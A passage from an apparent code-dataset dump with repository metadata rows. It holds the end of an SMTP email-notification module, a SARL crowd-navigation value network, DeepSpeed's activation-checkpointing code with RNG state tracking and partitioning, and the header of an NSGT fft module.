from communications import destination_base
from model import model_helper
from model.model_helper import read_bool_from_config
def split_addresses(addresses_string):
if ',' in addresses_string:
return addresses_string.split(',')
if ';' in addresses_string:
return addresses_string.split(';')
return [addresses_string]
def _create_communicator(config):
return EmailCommunicator(config)
def _body_dict_to_message(body_dict):
result = ''
for key, value in body_dict.items():
if result:
result += '\n'
result += key + ': ' + str(value)
return result
class EmailDestination(destination_base.Destination):
def __init__(self, config) -> None:
super().__init__()
self._communicator = _create_communicator(config)
def send(self, title, body, files=None):
if isinstance(body, dict):
body = _body_dict_to_message(body)
self._communicator.send(title, body, files)
class EmailCommunicator:
def __init__(self, params_dict):
self.from_address = params_dict.get('from')
self.to_addresses = params_dict.get('to')
self.server = params_dict.get('server')
self.auth_enabled = read_bool_from_config('auth_enabled', params_dict)
self.login = params_dict.get('login')
self.tls = read_bool_from_config('tls', params_dict)
self.password = self.read_password(params_dict)
self.to_addresses = split_addresses(self.to_addresses)
if not self.from_address:
raise Exception('"from" is compulsory parameter for email destination')
if not self.to_addresses:
raise Exception('"to" is compulsory parameter for email destination')
if not self.server:
raise Exception('"server" is compulsory parameter for email destination')
if self.auth_enabled is None:
self.auth_enabled = self.password or self.login
if self.auth_enabled and (not self.login):
self.login = self.from_address
if (self.tls is None) and ('gmail' in self.server):
self.tls = True
@staticmethod
def read_password(params_dict):
password = params_dict.get('password')
password = model_helper.resolve_env_vars(password, full_match=True)
return password
def send(self, title, body, files=None):
message = MIMEMultipart()
message['From'] = self.from_address
message['To'] = ','.join(self.to_addresses)
message['Date'] = formatdate(localtime=True)
message['Subject'] = title
message.attach(MIMEText(body))
server = smtplib.SMTP(self.server)
server.ehlo()
if self.tls:
server.starttls()
if self.auth_enabled:
server.login(self.login, self.password)
if files:
for file in files:
filename = file.filename
part = MIMEApplication(file.content, Name=filename)
part['Content-Disposition'] = 'attachment; filename="%s"' % filename
message.attach(part)
server.sendmail(self.from_address, self.to_addresses, message.as_string())
server.quit()
def __str__(self, *args, **kwargs):
return 'mail to ' + '; '.join(self.to_addresses) + ' over ' + self.from_address
| 30.144068 | 87 | 0.653641 |
1b3e98c9c632f57b19ac2ed5bca04ac72e9e5cf8 | 4,180 | py | Python | gym_collision_avoidance/envs/policies/LearningCADRL/policy/sarl.py | meghdeepj/Social-Navigation-Simulator | 806d304081bf5ff4fc7a0a58defb050627375865 | [
"MIT"
] | null | null | null | gym_collision_avoidance/envs/policies/LearningCADRL/policy/sarl.py | meghdeepj/Social-Navigation-Simulator | 806d304081bf5ff4fc7a0a58defb050627375865 | [
"MIT"
] | null | null | null | gym_collision_avoidance/envs/policies/LearningCADRL/policy/sarl.py | meghdeepj/Social-Navigation-Simulator | 806d304081bf5ff4fc7a0a58defb050627375865 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from torch.nn.functional import softmax
import logging
from gym_collision_avoidance.envs.policies.LearningCADRL.policy.cadrl import mlp
from gym_collision_avoidance.envs.policies.LearningCADRL.policy.multi_human_rl import MultiHumanRL
class ValueNetwork(nn.Module):
def __init__(self, input_dim, self_state_dim, mlp1_dims, mlp2_dims, mlp3_dims, attention_dims, with_global_state,
cell_size, cell_num):
super().__init__()
self.self_state_dim = self_state_dim
self.global_state_dim = mlp1_dims[-1]
self.mlp1 = mlp(input_dim, mlp1_dims, last_relu=True)
self.mlp2 = mlp(mlp1_dims[-1], mlp2_dims)
self.with_global_state = with_global_state
if with_global_state:
self.attention = mlp(mlp1_dims[-1] * 2, attention_dims)
else:
self.attention = mlp(mlp1_dims[-1], attention_dims)
self.cell_size = cell_size
self.cell_num = cell_num
mlp3_input_dim = mlp2_dims[-1] + self.self_state_dim
self.mlp3 = mlp(mlp3_input_dim, mlp3_dims)
self.attention_weights = None
def forward(self, state):
"""
First transform the world coordinates to self-centric coordinates and then do forward computation
:param state: tensor of shape (batch_size, # of humans, length of a rotated state)
:return:
"""
size = state.shape
self_state = state[:, 0, :self.self_state_dim]
mlp1_output = self.mlp1(state.view((-1, size[2])))
mlp2_output = self.mlp2(mlp1_output)
if self.with_global_state:
# compute attention scores
global_state = torch.mean(mlp1_output.view(size[0], size[1], -1), 1, keepdim=True)
global_state = global_state.expand((size[0], size[1], self.global_state_dim)).\
contiguous().view(-1, self.global_state_dim)
attention_input = torch.cat([mlp1_output, global_state], dim=1)
else:
attention_input = mlp1_output
scores = self.attention(attention_input).view(size[0], size[1], 1).squeeze(dim=2)
# masked softmax
# weights = softmax(scores, dim=1).unsqueeze(2)
scores_exp = torch.exp(scores) * (scores != 0).float()
weights = (scores_exp / torch.sum(scores_exp, dim=1, keepdim=True)).unsqueeze(2)
self.attention_weights = weights[0, :, 0].data.cpu().numpy()
# output feature is a linear combination of input features
features = mlp2_output.view(size[0], size[1], -1)
# for converting to onnx
# expanded_weights = torch.cat([torch.zeros(weights.size()).copy_(weights) for _ in range(50)], dim=2)
weighted_feature = torch.sum(torch.mul(weights, features), dim=1)
# concatenate agent's state with global weighted humans' state
joint_state = torch.cat([self_state, weighted_feature], dim=1)
value = self.mlp3(joint_state)
return value
class SARL(MultiHumanRL):
def __init__(self):
super().__init__()
self.name = 'SARL'
def configure(self, config):
self.set_common_parameters(config)
mlp1_dims = [int(x) for x in config.get('sarl', 'mlp1_dims').split(', ')]
mlp2_dims = [int(x) for x in config.get('sarl', 'mlp2_dims').split(', ')]
mlp3_dims = [int(x) for x in config.get('sarl', 'mlp3_dims').split(', ')]
attention_dims = [int(x) for x in config.get('sarl', 'attention_dims').split(', ')]
self.with_om = config.getboolean('sarl', 'with_om')
with_global_state = config.getboolean('sarl', 'with_global_state')
self.model = ValueNetwork(self.input_dim(), self.self_state_dim, mlp1_dims, mlp2_dims, mlp3_dims,
attention_dims, with_global_state, self.cell_size, self.cell_num)
self.multiagent_training = config.getboolean('sarl', 'multiagent_training')
if self.with_om:
self.name = 'OM-SARL'
logging.info('Policy: {} {} global state'.format(self.name, 'w/' if with_global_state else 'w/o'))
def get_attention_weights(self):
return self.model.attention_weights
| 46.444444 | 117 | 0.652392 |
c5c4a1cd9ba151e4a55911dda45d547931eb2e8e | 32,886 | py | Python | deepspeed/runtime/activation_checkpointing/checkpointing.py | Quentin-Anthony/DeeperSpeed | eb7f5cff36678625d23db8a8fe78b4a93e5d2c75 | [
"MIT"
] | 58 | 2021-01-24T08:57:03.000Z | 2022-03-31T07:47:13.000Z | deepspeed/runtime/activation_checkpointing/checkpointing.py | Quentin-Anthony/DeeperSpeed | eb7f5cff36678625d23db8a8fe78b4a93e5d2c75 | [
"MIT"
] | 1 | 2020-12-11T21:08:42.000Z | 2020-12-11T21:08:42.000Z | deepspeed/runtime/activation_checkpointing/checkpointing.py | Quentin-Anthony/DeeperSpeed | eb7f5cff36678625d23db8a8fe78b4a93e5d2c75 | [
"MIT"
] | 14 | 2021-01-25T03:48:44.000Z | 2022-03-18T12:58:14.000Z | '''
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
Use to partition the activations stored for backward propagation
Therefore reduces the memory consumption
Also implements CPU checkpointing and contiguous memory checkpointing
Reduces memory consumption and memory fragmentation
Code for rng checkpointing taken from NVIDIA Megatron-LM mpu/random.py
b886b7bb972afe72bac0f5de4f42a4a7bae8ebef
'''
# Parts of the code here are adapted from PyTorch
# repo: https://github.com/pytorch/pytorch
import copy
import torch
import contextlib
import torch.distributed as dist
import mmap
from torch import _C
from torch.cuda import _lazy_call, device as device_ctx_manager
from deepspeed.runtime.config import DeepSpeedConfig
from deepspeed.utils import logger
from deepspeed.runtime.utils import move_to_device, see_memory_usage
from deepspeed.utils.timer import SynchronizedWallClockTimer as Timers
# DeepSpeed Checkpointing Enabled or Disabled
deepspeed_checkpointing_enabled = False
# MP parameters
mpu = None
mp_rank = None
mp_size = None
mp_group = None
# Model Parameters
num_layers = None
# Checkpointing buffers
contiguous_data_buffers = []
data_offsets = []
contiguous_size_buffers = []
size_offsets = []
timers = None
# optimization flags
PARTITION_ACTIVATIONS = False
PA_TO_CPU = False
CONTIGUOUS_CHECKPOINTING = False
SYNCHRONIZE = False
PROFILE_TIME = False
# Default name for the model parallel rng tracker.
_MODEL_PARALLEL_RNG_TRACKER_NAME = 'model-parallel-rng'
transport_stream = None
cuda_device = None
def detach_variable(inputs, device=None):
if isinstance(inputs, tuple):
out = []
for inp in inputs:
if not isinstance(inp, torch.Tensor):
out.append(inp)
continue
requires_grad = inp.requires_grad
if device is not None:
x = inp.to(device=device)
else:
x = inp
x = x.detach()
x.requires_grad = requires_grad
out.append(x)
return tuple(out)
else:
raise RuntimeError(
"Only tuple of tensors is supported. Got Unsupported input type: ",
type(inputs).__name__)
def _set_cuda_rng_state(new_state, device=-1):
"""Sets the random number generator state of the current GPU.
Arguments:
new_state (torch.ByteTensor): The desired state
This function is adapted from PyTorch repo (torch.cuda.set_rng_state)
with a single change: the input state is not cloned. Cloning caused
major performance issues for +4 GPU cases.
"""
if hasattr(_C, '_cuda_setRNGState') and callable(_C._cuda_setRNGState):
# older PyTorch
def cb():
with device_ctx_manager(device):
_C._cuda_setRNGState(new_state)
else:
# newer PyTorch
if device == -1:
device = torch.device('cuda')
elif isinstance(device, str):
device = torch.device(device)
elif isinstance(device, int):
device = torch.device('cuda', device)
def cb():
idx = device.index
if idx is None:
idx = torch.cuda.current_device()
default_generator = torch.cuda.default_generators[idx]
default_generator.set_state(new_state)
_lazy_call(cb)
class CudaRNGStatesTracker:
"""Tracker for the cuda RNG states.
Using the `add` method, a cuda rng state is initialized based on
the input `seed` and is assigned to `name`. Later, by forking the
rng state, we can perform operations and return to our starting
cuda state.
"""
def __init__(self):
# Map from a string name to the cuda rng state.
self.states_ = {}
# Seeds are just for book keeping and ensure no seed is set twice.
self.seeds_ = set()
def reset(self):
"""Set to the initial state (no tracker)."""
self.states_ = {}
self.seeds_ = set()
def get_states(self):
"""Get rng states. Copy the dictionary so we have direct
pointers to the states, not just a pointer to the dictionary."""
return copy.copy(self.states_)
def set_states(self, states):
"""Set the rng states. For efficiency purposes, we do not check
the size of seed for compatibility."""
self.states_ = states
def add(self, name, seed):
"""Track the rng state."""
# Check seed is not already used.
if seed in self.seeds_:
raise Exception('seed {} already exists'.format(seed))
self.seeds_.add(seed)
# Check that state is not already defined.
if name in self.states_:
raise Exception('cuda rng state {} already exists'.format(name))
# Get the current rng state.
orig_rng_state = torch.cuda.get_rng_state()
# Set the new state and store it.
torch.cuda.manual_seed(seed)
self.states_[name] = torch.cuda.get_rng_state()
# Reset rng state to what it was.
_set_cuda_rng_state(orig_rng_state)
@contextlib.contextmanager
def fork(self, name=_MODEL_PARALLEL_RNG_TRACKER_NAME):
"""Fork the cuda rng state, perform operations, and exit with
the original state."""
# Check if we have added the state
if name not in self.states_:
raise Exception('cuda rng state {} is not added'.format(name))
# Store current rng state.
orig_cuda_rng_state = torch.cuda.get_rng_state()
# Set rng state to the desired one
_set_cuda_rng_state(self.states_[name])
# Do the stuff we wanted to do.
try:
yield
finally:
# Update the current rng state for later use.
self.states_[name] = torch.cuda.get_rng_state()
# And set the state to the original state we started with.
_set_cuda_rng_state(orig_cuda_rng_state)
# RNG tracker object.
_CUDA_RNG_STATE_TRACKER = CudaRNGStatesTracker()
def get_cuda_rng_tracker():
"""Get cuda rng tracker."""
return _CUDA_RNG_STATE_TRACKER
def model_parallel_cuda_manual_seed(seed):
"""Initialize model parallel cuda seed.
This function should be called after the model parallel is
initialized. Also, no torch.cuda.manual_seed should be called
after this function. Basically, this is replacement for that
function.
Two set of RNG states are tracked:
default state: This is for data parallelism and is the same among a
set of model parallel GPUs but different across
different model paralle groups. This is used for
example for dropout in the non-model-parallel regions.
model-parallel state: This state is different among a set of model
parallel GPUs, but the same across data parallel
groups. This is used for example for dropout in
model parallel regions.
"""
global mpu
# 2718 is just for fun and any POSITIVE value will work.
offset = seed + 2718
model_parallel_seed = offset + mpu.get_model_parallel_rank()
# Data parallel gets the original sedd.
data_parallel_seed = seed
if torch.distributed.get_rank() == 0:
logger.info(
'> initializing model parallel cuda seeds on global rank {}, '
'model parallel rank {}, and data parallel rank {} with '
'model parallel seed: {} and data parallel seed: {}'.format(
torch.distributed.get_rank(),
mpu.get_model_parallel_rank(),
mpu.get_data_parallel_rank(),
model_parallel_seed,
data_parallel_seed),
)
_CUDA_RNG_STATE_TRACKER.reset()
# Set the default state.
torch.cuda.manual_seed(data_parallel_seed)
# and model parallel state.
_CUDA_RNG_STATE_TRACKER.add(_MODEL_PARALLEL_RNG_TRACKER_NAME, model_parallel_seed)
def get_partition_start(item):
global mp_rank, mp_size, mp_group
size = item.numel()
partition_size = size / mp_size
start = partition_size * mp_rank
return int(start)
def get_partition_size(item):
global mp_rank, mp_size, mp_group
size = item.numel()
assert size % mp_size == 0, "Doesn't handle if partition activation if item is not divisible by mp size"
partition_size = size / mp_size
return int(partition_size)
def get_full_inputs(tensors, device=None, fp32_comm=False):
inputs = []
num_args = int(len(tensors) / 2)
for i in range(num_args - 1):
item = tensors[2 * i]
size = tensors[2 * i + 1]
partition_size = item.numel()
tensor_size = partition_size * mp_size
if device is not None:
flat_tensor = torch.zeros([tensor_size], dtype=item.dtype, device=device)
else:
flat_tensor = torch.zeros([tensor_size],
dtype=item.dtype,
device=item.device)
partitions = []
for i in range(mp_size):
part_i = flat_tensor.narrow(0, partition_size * i, partition_size)
if i == mp_rank:
part_i.copy_(item)
if fp32_comm:
part_i = part_i.float()
partitions.append(part_i)
if mp_group is not None:
dist.all_gather(partitions, partitions[mp_rank], group=mp_group)
if fp32_comm:
for i in range(mp_size):
partitions[i] = partitions[i].to(item.dtype)
input_tensor = flat_tensor.view(list(size.numpy()))
item.data = input_tensor.data
inputs.append(item)
inputs.append(tensors[-2])
return tuple(inputs)
def extract_tensors(all_objects):
"""
Separate objects in list/tuple into tensors and non-tensors and create a mapping to enable re-aggregation.
The order of tensors and non-tensors is preserved in their respective output groups.
Parameters:
all_objects (list/tuple): Objects containing tensors and non-tensors to be split.
Returns:
tuple: Containing tensors, non-tensors, and bools of whether each position in original list/tuple was a tensor.
"""
tensor_objects = [v for v in all_objects if torch.is_tensor(v)]
non_tensor_objects = [v for v in all_objects if not torch.is_tensor(v)]
tensor_flags = [torch.is_tensor(v) for v in all_objects]
if type(all_objects) is tuple:
return tuple(tensor_objects), tuple(non_tensor_objects), tuple(tensor_flags)
return tensor_objects, non_tensor_objects, tensor_flags
def merge_tensors(tensor_objects, non_tensor_objects, tensor_flags):
"""
Merge two lists (or tuples) of tensors and non-tensors using a mapping of positions in merged list (or tuple).
Parameters:
tensor_objects (list/tuple): Tensors to merge.
non_tensor_objects (list/tuple): Non-tensors to merge.
tensor_flags (list/tuple): Indicates whether each position in output is a tensor.
Returns:
tuple: Merge of tensors and non-tensors
"""
merged_objects = []
tensor_idx = 0
non_tensor_idx = 0
real_tensor_flags = None
#remove the flags that are assigned to the size of the flattened tensors
if PARTITION_ACTIVATIONS:
real_tensor_flags = []
previous_flag = False
for flag in tensor_flags:
if previous_flag:
previous_flag = False
continue
previous_flag = flag
real_tensor_flags.append(flag)
else:
real_tensor_flags = tensor_flags
for is_tensor in real_tensor_flags:
if is_tensor:
merged_objects.append(tensor_objects[tensor_idx])
tensor_idx += 1
else:
merged_objects.append(non_tensor_objects[non_tensor_idx])
non_tensor_idx += 1
return tuple(merged_objects)
class CheckpointFunction(torch.autograd.Function):
"""This function is adapted from torch.utils.checkpoint with
two main changes:
1) torch.cuda.set_rng_state is replaced with `_set_cuda_rng_state`
2) the states in the model parallel tracker are also properly
tracked/set/reset.
3) Performance activation partitioning, contiguous memory optimization
4) CPU Checkpointing
5) Profile forward and backward functions
"""
@staticmethod
def forward(ctx, run_function, all_outputs, *args):
global mpu, timers, SYNCHRONIZE, PROFILE_TIME
def save_args_for_backward(*all_args):
tensor_args, non_tensor_args, tensor_flags = extract_tensors(all_objects=all_args)
ctx.save_for_backward(*tensor_args)
ctx.non_tensor_args = non_tensor_args
ctx.tensor_flags = tensor_flags
if SYNCHRONIZE:
torch.cuda.synchronize()
if timers is None and PROFILE_TIME:
timers = Timers()
if PROFILE_TIME:
timers('forward').start()
ctx.run_function = run_function
global num_layers
global mp_rank, mp_size, mp_group
global contiguous_data_buffers, contiguous_size_buffers
global data_offsets, size_offsets
if mp_rank is None:
if mpu is not None:
mp_rank = mpu.get_model_parallel_rank()
mp_size = mpu.get_model_parallel_world_size()
mp_group = mpu.get_model_parallel_group()
else:
mp_rank = 0
mp_size = 1
mp_group = None
global cuda_device, transport_stream, PARTITION_ACTIVATIONS, buffer_0, buffer_1, buffer_0_offset, buffer_1_offset
if cuda_device is None:
see_memory_usage("First Forward Begining", force=False)
if dist.get_rank() == 0:
logger.info(f"Activation Checkpointing Information")
logger.info(
f"----Partition Activations {PARTITION_ACTIVATIONS}, CPU CHECKPOINTING {PA_TO_CPU}"
)
logger.info(
f"----contiguous Memory Checkpointing {CONTIGUOUS_CHECKPOINTING} with {num_layers} total layers"
)
logger.info(f"----Synchronization {SYNCHRONIZE}")
logger.info(f"----Profiling {PROFILE_TIME}")
cuda_device = torch.cuda.current_device()
transport_stream = torch.cuda.Stream(device=cuda_device)
if PARTITION_ACTIVATIONS:
#inputs = [item.detach().contiguous().view(-1).narrow(0, get_partition_start(item), get_partition_size(item)).clone() for item in args[:-1]]
# inputs.append(args[-1])
inputs = []
for i, item in enumerate(args[:-1]):
if not torch.is_tensor(item):
inputs.append(item)
continue
partition_size = get_partition_size(item)
partition = item.detach().contiguous().view(-1).narrow(
0,
get_partition_start(item),
partition_size).clone()
if CONTIGUOUS_CHECKPOINTING:
buffer_device = torch.device(
'cpu') if PA_TO_CPU else partition.device
if i >= len(contiguous_data_buffers):
tensor_list = [
torch.tensor(()).new_empty([partition_size],
dtype=partition.dtype,
device=buffer_device)
for i in range(num_layers)
]
contiguous_data_buffers.append(tensor_list)
data_offsets.append(0)
elif contiguous_data_buffers[i] is None:
tensor_list = [
torch.tensor(()).new_empty([partition_size],
dtype=partition.dtype,
device=buffer_device)
for i in range(num_layers)
]
contiguous_data_buffers[i] = tensor_list
data_offsets[i] = 0
# Because the 'new_empty' returns uninitialized pages,
# the pages need to be populated during the cudaMemcpy time
# which increases the data copy time. To avoid this, we
# pre-populate these pages by simply writing 0 ahead of
# the actual cudaMemcpy operation time. Due to the
# previously launched GPU kernels, there is a small
# window of time here for CPUs to populate pages asynchronously.
contiguous_data_buffers[i][data_offsets[i]].data[range(
0,
contiguous_data_buffers[i][data_offsets[i]].data.shape[0],
int(mmap.PAGESIZE / contiguous_data_buffers[i][
data_offsets[i]].data.element_size()))] = 0
contiguous_partition = contiguous_data_buffers[i][
data_offsets[i]].data.copy_(partition.data)
data_offsets[i] = data_offsets[i] + 1
inputs.append(contiguous_partition)
else:
partition = partition.cpu() if PA_TO_CPU else partition
inputs.append(partition)
inputs.append(args[-1])
#just in case something funky is happening such as reuse of inputs
inputs_cuda = move_to_device(args, cuda_device)
# Copy the rng states.
ctx.fwd_cpu_rng_state = torch.get_rng_state()
ctx.fwd_cuda_rng_state = torch.cuda.get_rng_state()
ctx.fwd_cuda_rng_state_tracker = get_cuda_rng_tracker().get_states()
see_memory_usage("Before running forward on the layer", force=False)
# ctx.save_for_backward(*args)
with torch.no_grad():
outputs = run_function(*inputs_cuda)
see_memory_usage("After running forward on the layer", force=False)
del inputs_cuda
# with torch.cuda.stream(transport_stream):
# if PARTITION_ACTIVATIONS:
# new_args = []
# for arg, inp in zip(args,inputs):
# size= torch.tensor(arg.size())
# arg.data = inp.data
# new_args.append(arg)
# new_args.append(size)
# ctx.save_for_backward(*new_args)
if PARTITION_ACTIVATIONS:
new_args = []
for i, (arg, inp) in enumerate(zip(args, inputs)):
if not torch.is_tensor(arg):
new_args.append(arg)
continue
size = torch.tensor(arg.size())
arg.data = inp.data
new_args.append(arg)
if CONTIGUOUS_CHECKPOINTING:
numel = size.numel()
if i >= len(contiguous_size_buffers):
tmp = torch.tensor(())
contiguous_size_buffers.append(
tmp.new_empty([numel * num_layers],
dtype=size.dtype,
device=size.device))
size_offsets.append(0)
elif contiguous_size_buffers[i] is None:
tmp = torch.tensor(())
contiguous_size_buffers[i] = tmp.new_empty([numel * num_layers],
dtype=size.dtype,
device=size.device)
size_offsets[i] = 0
contiguous_size = contiguous_size_buffers[i].narrow(
0,
size_offsets[i],
numel).data.copy_(size.data)
contiguous_size = contiguous_size.view_as(size)
size_offsets[i] = size_offsets[i] + numel
new_args.append(contiguous_size)
else:
new_args.append(size)
# if dist.get_rank() == 0:
# logger.info(f"The stored tensor is {contiguous_size} and orginal one is {size} ")
save_args_for_backward(*new_args)
else:
save_args_for_backward(*args)
if PROFILE_TIME:
timers('forward').stop()
timers.log(['forward'])
if SYNCHRONIZE:
torch.cuda.synchronize()
# Tensors returned from forward() may not be differentiable.
if torch.is_tensor(outputs):
non_grad_outputs = [outputs] if not outputs.is_floating_point() else []
else:
non_grad_outputs = [
o for o in outputs if torch.is_tensor(o) and not o.is_floating_point()
]
ctx.mark_non_differentiable(*non_grad_outputs)
if torch.is_tensor(outputs):
all_outputs += [outputs]
return outputs
else:
all_outputs += outputs
outputs, _, _ = extract_tensors(all_objects=outputs)
return tuple(outputs)
@staticmethod
def backward(ctx, *grads):
global timers
see_memory_usage("In backward", force=False)
# removing pointers to the contiguous buffer memory
# so that they can be garbage collected once the checkpoints
# have been used
if SYNCHRONIZE:
torch.cuda.synchronize()
if PROFILE_TIME:
timers('backward').start()
if CONTIGUOUS_CHECKPOINTING:
global data_offsets, size_offsets
global contiguous_data_buffers, contiguous_size_buffers
for buffers in contiguous_data_buffers:
buffers = []
# frees up all the pointers to the checkpoints except for the ones
# stored by save for backward
contiguous_data_buffers = []
contiguous_size_buffers = []
data_offsets = []
size_offsets = []
see_memory_usage("In backward checkpointing code", force=False)
if not torch.autograd._is_checkpoint_valid():
raise RuntimeError("Checkpointing is not compatible with .grad(), "
"please use .backward() if possible")
global cuda_device, transport_stream, PARTITION_ACTIVATIONS
if PARTITION_ACTIVATIONS:
if ctx.saved_tensors and ctx.saved_tensors[0].dtype == torch.bfloat16:
FP32_COMM = True
else:
FP32_COMM = False
# with torch.cuda.stream(transport_stream):
inputs = get_full_inputs(ctx.saved_tensors,
device=cuda_device if PA_TO_CPU else None,
fp32_comm=FP32_COMM)
detached_inputs = detach_variable(inputs)
else:
inputs = ctx.saved_tensors
detached_inputs = detach_variable(inputs)
# Add non tensor input args
detached_inputs = merge_tensors(tensor_objects=detached_inputs,
non_tensor_objects=ctx.non_tensor_args,
tensor_flags=ctx.tensor_flags)
# Store the current states.
bwd_cpu_rng_state = torch.get_rng_state()
bwd_cuda_rng_state = torch.cuda.get_rng_state()
bwd_cuda_rng_state_tracker = get_cuda_rng_tracker().get_states()
# Set the states to what it used to be before the forward pass.
torch.set_rng_state(ctx.fwd_cpu_rng_state)
_set_cuda_rng_state(ctx.fwd_cuda_rng_state)
get_cuda_rng_tracker().set_states(ctx.fwd_cuda_rng_state_tracker)
# if PARTITION_ACTIVATIONS:
# current_stream=torch.cuda.current_stream()
# current_stream.wait_stream(transport_stream)
see_memory_usage("In backward checkpointing code before forward", force=False)
with torch.enable_grad():
outputs = ctx.run_function(*detached_inputs)
see_memory_usage("In backward checkpointing code after forward", force=False)
# Set the states back to what it was at the start of this function.
torch.set_rng_state(bwd_cpu_rng_state)
_set_cuda_rng_state(bwd_cuda_rng_state)
get_cuda_rng_tracker().set_states(bwd_cuda_rng_state_tracker)
if isinstance(outputs, torch.Tensor):
outputs = (outputs, )
# Filter out non tensor outputs
outputs, _, _ = extract_tensors(all_objects=outputs)
# Construct arguments to autograd.backward().
# This is usually just outputs and grads, but forward() can return tensors that
# are not differentiable.
output_tensors = []
grad_tensors = []
for out, grad in zip(outputs, grads):
if out.requires_grad:
output_tensors.append(out)
grad_tensors.append(grad)
see_memory_usage("In backward checkpointing code before backward", force=False)
torch.autograd.backward(output_tensors, grad_tensors)
see_memory_usage("After backward checkpointing code after backward", force=False)
if PROFILE_TIME:
timers('backward').stop()
timers.log(['backward'])
if SYNCHRONIZE:
torch.cuda.synchronize()
ret_list = [None, None] # first None for ctx
for inp in detached_inputs:
if torch.is_tensor(inp):
ret_list.append(inp.grad)
else:
ret_list.append(None)
return tuple(ret_list)
def checkpoint(function, *args):
"""Checkpoint a model or part of the model.
This has been directly copied from torch.utils.checkpoint. """
all_outputs = []
CheckpointFunction.apply(function, all_outputs, *args)
if len(all_outputs) == 1:
return all_outputs[0]
else:
return tuple(all_outputs)
def partition_activations_in_checkpoint(partition_activation):
global PARTITION_ACTIVATIONS
PARTITION_ACTIVATIONS = partition_activation
if dist.get_rank() == 0:
logger.info(
f"**************Partition Activations {PARTITION_ACTIVATIONS}************")
def set_num_layers(nlayers):
global num_layers
num_layers = nlayers
def reset():
"""Resets memory buffers related to contiguous memory optimizations.
Should be called during eval when multiple forward propagations are
computed without any backward propagation that usually clears these
buffers.
Arguments:
None
Return:
None
"""
if CONTIGUOUS_CHECKPOINTING:
global data_offsets, size_offsets
global contiguous_data_buffers, contiguous_size_buffers
for buffers in contiguous_data_buffers:
buffers = []
# frees up all the pointers to the checkpoints except for the ones
# stored by save for backward
contiguous_data_buffers = []
contiguous_size_buffers = []
data_offsets = []
size_offsets = []
def _configure_using_config_file(deepspeed_config, mpu=None):
global num_layers, PARTITION_ACTIVATIONS, CONTIGUOUS_CHECKPOINTING, \
PA_TO_CPU, SYNCHRONIZE, PROFILE_TIME
config = DeepSpeedConfig(deepspeed_config, mpu=mpu).activation_checkpointing_config
if dist.get_rank() == 0:
logger.info(config.repr())
PARTITION_ACTIVATIONS = config.partition_activations
CONTIGUOUS_CHECKPOINTING = config.contiguous_memory_optimization
num_layers = config.number_checkpoints
PA_TO_CPU = config.cpu_checkpointing
SYNCHRONIZE = config.synchronize_checkpoint_boundary
PROFILE_TIME = config.profile
def _configure_defaults():
global mpu, num_layers, deepspeed_checkpointing_enabled
global PARTITION_ACTIVATIONS, CONTIGUOUS_CHECKPOINTING, \
PA_TO_CPU, SYNCHRONIZE, PROFILE_TIME
PARTITION_ACTIVATIONS = False
CONTIGUOUS_CHECKPOINTING = False
num_layers = False
PA_TO_CPU = False
SYNCHRONIZE = False
PROFILE_TIME = False
deepspeed_checkpointing_enabled = True
def configure(
mpu_,
deepspeed_config=None,
partition_activations=None,
contiguous_checkpointing=None,
num_checkpoints=None,
checkpoint_in_cpu=None,
synchronize=None,
profile=None,
):
"""Configure DeepSpeed Activation Checkpointing.
Arguments:
mpu_: Optional: An object that implements the following methods
get_model_parallel_rank/group/world_size, and get_data_parallel_rank/group/world_size
deepspeed_config: Optional: DeepSpeed Config json file when provided will be used to
configure DeepSpeed Activation Checkpointing
partition_activations: Optional: Partitions activation checkpoint across model parallel
GPUs when enabled. By default False. Will overwrite deepspeed_config if provided
contiguous_checkpointing: Optional: Copies activation checkpoints to a contiguous memory
buffer. Works only with homogeneous checkpoints when partition_activations is enabled.
Must provide num_checkpoints. By default False. Will overwrite deepspeed_config if
provided
num_checkpoints: Optional: Number of activation checkpoints stored during the forward
propagation of the model. Used to calculate the buffer size for contiguous_checkpointing
Will overwrite deepspeed_config if provided
checkpoint_in_cpu: Optional: Moves the activation checkpoint to CPU. Only works with
partition_activation. Default is false. Will overwrite deepspeed_config if provided
synchronize: Optional: Performs torch.cuda.synchronize() at the beginning and end of
each call to deepspeed.checkpointing.checkpoint for both forward and backward pass.
By default false. Will overwrite deepspeed_config if provided
profile: Optional: Logs the forward and backward time for each
deepspeed.checkpointing.checkpoint invocation. Will overwrite deepspeed_config
if provided
Returns:
None
"""
global mpu, num_layers, deepspeed_checkpointing_enabled
global PARTITION_ACTIVATIONS, CONTIGUOUS_CHECKPOINTING, \
PA_TO_CPU, SYNCHRONIZE, PROFILE_TIME
_configure_defaults()
if mpu_ is not None:
mpu = mpu_
if deepspeed_config is not None:
_configure_using_config_file(deepspeed_config, mpu=mpu)
if partition_activations is not None:
PARTITION_ACTIVATIONS = partition_activations
if contiguous_checkpointing is not None:
CONTIGUOUS_CHECKPOINTING = contiguous_checkpointing
if num_checkpoints is not None:
num_layers = num_checkpoints
if checkpoint_in_cpu is not None:
PA_TO_CPU = checkpoint_in_cpu
if synchronize is not None:
SYNCHRONIZE = synchronize
if profile is not None:
PROFILE_TIME = profile
if PA_TO_CPU or CONTIGUOUS_CHECKPOINTING:
assert PARTITION_ACTIVATIONS, "CPU Checkpointing/Contiguous Checkpointing is only availble with partitioned activations. Set partitioned activations to true in deepspeed config"
if CONTIGUOUS_CHECKPOINTING:
assert num_layers is not None, "Must specify the number of layers with contiguous memory checkpointing"
def is_configured():
"""True if deepspeed activation checkpointing has been configured
by calling deepspeed.checkpointing.configure, else returns false
Arguments:
None
Return:
True of configured, else False
"""
return deepspeed_checkpointing_enabled
| 38.150812 | 186 | 0.609895 |
41c89cd6020efea7a5a86717aeaeec36d687cc43 | 5,156 | py | Python | nsgt/fft.py | smallnamespace/nsgt | 48b1c695d7c0e1f5ab93d1907583725fc8160a8e | [
"Artistic-2.0"
] | 2 | 2021-05-11T20:50:29.000Z | 2021-05-12T00:56:08.000Z | nsgt/fft.py | smallnamespace/nsgt | 48b1c695d7c0e1f5ab93d1907583725fc8160a8e | [
"Artistic-2.0"
] | null | null | null | nsgt/fft.py | smallnamespace/nsgt | 48b1c695d7c0e1f5ab93d1907583725fc8160a8e | [
"Artistic-2.0"
] | null | null | null | # -*- coding: utf-8
"""
Python implementation of Non-Stationary Gabor Transform (NSGT)
derived from MATLAB code by NUHAG, University of Vienna, Austria
Thomas Grill, 2011-2015
http://grrrr.org/nsgt
Austrian Research Institute for Artificial Intelligence (OFAI)
AudioMiner project, supported by Vienna Science and Technology Fund (WWTF)
"""
